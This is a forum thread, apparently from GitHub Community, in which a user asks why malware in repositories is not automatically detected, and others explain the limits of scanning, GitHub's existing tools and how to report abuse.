Why is malware on GitHub not automatically detected and removed?

[hapepo23]

Select Topic Area

Question

Body

Today I found again malware in a "honeypot" repository -
see this directory: https://github.com/prider7/codewars-challenges/tree/master/subsistential
My GitHub Support messages are ignored, and I ask myself:
Why is malware on GitHub not automatically detected and removed?
I don't get it.

[turanalmammadov]

This is a common and understandable frustration. Here is how GitHub handles malware and some steps you can take:

Why automatic detection is difficult

GitHub hosts hundreds of millions of repositories. Automatically scanning all code for malware is computationally extremely challenging because:

• Code can be obfuscated, encoded, or stored in non-obvious forms
• What looks like malware in one context (security research, honeypots, educational repos) is legitimate in another
• Novel malware variants are constantly emerging

What GitHub does

GitHub does scan for some categories of malicious content, including:

• Secret scanning — detects exposed API keys, tokens, and credentials
• Dependency vulnerability scanning — alerts on known-vulnerable packages
• CSAM detection — automatic detection and removal
• Community reports — the primary mechanism for most malware/abuse cases

What you should do

1. Report the repository directly: Use the Report abuse link on the repository page (flag icon → Report content)
2. Contact GitHub Support: https://support.github.com/contact — include the specific URL and describe why it is malware
3. Report through GitHub Community: https://github.com/github/feedback/discussions
4. If it violates ToS: GitHub reviews reports of Acceptable Use Policy violations

Useful links

• Reporting abuse or spam
• GitHub Security policies
• GitHub contact support

For security researchers: if you found malware hosted on GitHub, the Security Lab team at https://securitylab.github.com/ may also be interested.

[pratikrath126]

GitHub does scan uploaded content for known malware using virus definitions, but it’s not foolproof—new or obfuscated malware can slip through. For issues that aren’t caught automatically, you can report them via GitHub Support or the abuse contact. Once verified, content that violates the Acceptable Use Policy is removed. You can also enable Advanced Security features like secret scanning and code scanning to catch certain threats early.

[ALPHYPSYCHE]

Detecting malware at GitHub's scale (over 420 million repositories) is an immense technical challenge.

Legitimate Use Cases: Many security researchers host "malware" for educational or defensive purposes. Outright automated banning would hinder legitimate cybersecurity research.
Evasion Techniques: Attackers use obfuscation and "fork bombs" (creating thousands of clones) to hide malicious code within seemingly benign updates.
Responsibility Model: GitHub provides tools like Secret Scanning and Dependabot, but ultimately, Git is designed for collaboration, and the responsibility for reviewing third-party code before execution often falls on the end user.

[itxashancode]

GitHub's automated systems primarily scan for known vulnerabilities (via Dependabot) and exposed secrets, not general malware. They don't run every file through antivirus engines because that would generate massive false positives for legitimate research, security tools, and obfuscated code.

The repository you linked is explicitly named "honeypot" and contains a Python script that antivirus engines flag - likely because it's designed to mimic attack behavior for research. GitHub's policy is to remove content that's actually malicious (like ransomware, stealers), but security research and proof-of-concepts are often permitted unless they cross into active threat distribution.

I've reported similar repos before. GitHub Support typically reviews reports manually. If they didn't act, they likely determined it falls under allowed security research. You can file a more specific report citing the exact malicious behavior (e.g., "this script downloads and executes payloads from C2 server X"), not just that it's flagged by VirusTotal.

Is the script actively connecting to malicious infrastructure, or is it just a static trap? That distinction matters.

[KnightOfChalphy]

Lol, all you got were AI-generated nothingburger replies. The truth is that GitHub is filled with low-complexity malware that gets uploaded every day (i.e., template malware code, unverified binaries, suspicious URLs, etc.), and all of these repositories should get detected and marked almost instantly. No one should have to manually scan every file in a repository that has less than 100 stars in 2026. Obviously high-level obfuscation will slip by every now and then, but this website has a major malware issue that needs to be addressed.

[orchidfiles]

I wrote an article on this topic a few days ago: I discovered a large-scale malware distribution campaign on GitHub